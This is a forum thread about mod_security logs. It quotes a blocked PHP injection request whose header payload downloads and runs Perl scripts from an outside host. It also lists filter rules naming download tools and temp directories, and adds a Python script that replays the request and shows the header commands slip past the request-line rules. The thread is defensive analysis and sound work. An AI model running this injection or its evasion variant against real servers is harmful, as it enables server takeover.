
just looking at my mod_sec logs


BornOnline
08-05-2005, 05:06 PM
Geez... just make sure you have "system" disabled in php.ini at least.

Been seeing this for the last two days... interesting stuff

GET /index.php?Operation=ItemLookup&ItemId=VTC&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Accept: */*
Host: *****.com
PHP: cd /tmp; lynx -source http://home.*.*/~user/b4clone > b4clone.pl; perl b4clone.pl; lynx -source http://home.*.*/~user/spreader > s.pl;$
User-Agent: Mozilla/4.0
mod_security-message: Access denied with code 403. Pattern match "system\(" at THE_REQUEST.
mod_security-action: 403


Using this in mod_sec

SecFilterSelective THE_REQUEST "system\("
SecFilterSelective THE_REQUEST "passthru\("
SecFilter "wget\x20"
SecFilter "uname\x20-a"
SecFilterSelective THE_REQUEST "/bin/ls"
SecFilterSelective THE_REQUEST "/usr/bin/id"
SecFilter "conf/httpd\.conf"
SecFilterSelective THE_REQUEST "///"
SecFilter "cd[[:space:]]/tmp"
SecFilter "cd[[:space:]]/var/tmp"
SecFilter "cd[[:space:]]/dev/shm"
SecFilter "gcc\x20-o"
SecFilter "cc\x20"
# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
#SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
#SecFilterSelective THE_REQUEST "cvs "
#SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
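
What is worth noticing in the quoted request is where the payload actually lives: the PHP code injected through the highlight parameter calls getenv(HTTP_PHP), so the shell commands ride in the custom "PHP:" request header and never appear in the URL. The script below is an added example, not code from the post or from mod_security; it replays a constructed request modelled on the quoted one (placeholder host and download URLs) against a subset of the posted rules and reports which rule fires and where. It assumes mod_security 1.x semantics, i.e. THE_REQUEST is the request line and a plain SecFilter searches the query string and request body but not arbitrary headers; check the manual for your installed version before relying on that.

```python
import re

# Constructed sample request, modelled on the one quoted above: the PHP code in
# the highlight parameter calls getenv(HTTP_PHP), so the shell commands ride in
# a custom "PHP:" request header rather than in the URL.  Host and download
# URLs are placeholders, not a real capture.
SAMPLE_REQUEST = (
    "GET /index.php?Operation=ItemLookup&ItemId=VTC"
    "&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0\r\n"
    "Accept: */*\r\n"
    "Host: example.com\r\n"
    "PHP: cd /tmp; lynx -source http://home.example.invalid/~user/b4clone"
    " > b4clone.pl; perl b4clone.pl\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "\r\n"
)

# A subset of the posted rules as (scope, pattern).  "THE_REQUEST" is the
# request line only; "SIMPLE" stands for SecFilter, which in mod_security 1.x
# searches the query string and request body (assumption about 1.x semantics;
# headers need SecFilterSelective on a header variable).
RULES = [
    ("THE_REQUEST", r"system\("),
    ("THE_REQUEST", r"passthru\("),
    ("SIMPLE", r"wget\x20"),
    ("SIMPLE", r"cd[[:space:]]/tmp"),
    ("THE_REQUEST", r"lynx "),
    ("THE_REQUEST", r"cd /tmp "),
]


def to_python_regex(pattern):
    """mod_security uses POSIX regex; map the one POSIX class used above."""
    return pattern.replace("[[:space:]]", r"\s")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request_line, headers, query_string)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    request_line = lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().upper()] = value.strip()
    target = request_line.split(" ")[1]
    query = target.partition("?")[2]
    return request_line, headers, query


def scope_text(scope, request_line, query):
    """Text a rule of the given scope actually inspects."""
    return request_line if scope == "THE_REQUEST" else query


def matching_rules(raw, rules=RULES):
    """Rules that fire on the parts of the request they inspect."""
    request_line, _, query = parse_request(raw)
    hits = []
    for scope, pattern in rules:
        if re.search(to_python_regex(pattern), scope_text(scope, request_line, query)):
            hits.append((scope, pattern))
    return hits


def header_commands(raw, header="PHP"):
    """Shell commands smuggled in the custom header, split on ';'."""
    _, headers, _ = parse_request(raw)
    value = headers.get(header.upper(), "")
    return [cmd.strip() for cmd in value.split(";") if cmd.strip()]


def header_only_hits(raw, rules=RULES, header="PHP"):
    """Patterns that match the header payload but none of the scanned scopes."""
    _, headers, _ = parse_request(raw)
    value = headers.get(header.upper(), "")
    scanned = {pattern for _, pattern in matching_rules(raw, rules)}
    return sorted(
        pattern for _, pattern in rules
        if pattern not in scanned and re.search(to_python_regex(pattern), value)
    )


if __name__ == "__main__":
    for scope, pattern in matching_rules(SAMPLE_REQUEST):
        print(f"blocked: pattern {pattern!r} at {scope}")
    print("commands in PHP header:", header_commands(SAMPLE_REQUEST))
    print("only visible in the header:", header_only_hits(SAMPLE_REQUEST))
```

Run as-is, the only rule that fires is "system\(" at THE_REQUEST, which is exactly what the quoted mod_security-message reports; the "cd /tmp" and "lynx" patterns match only the header payload, which none of the posted rules look at. That is fine as long as the request-line rule keeps catching the eval step, but it means the download-and-run commands themselves are invisible to this rule set, so a variant that hides the PHP call differently would get through with the same header intact.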

mikelbeck
08-05-2005, 05:48 PM
I've been getting that for a few weeks now. On a bunch of different domains.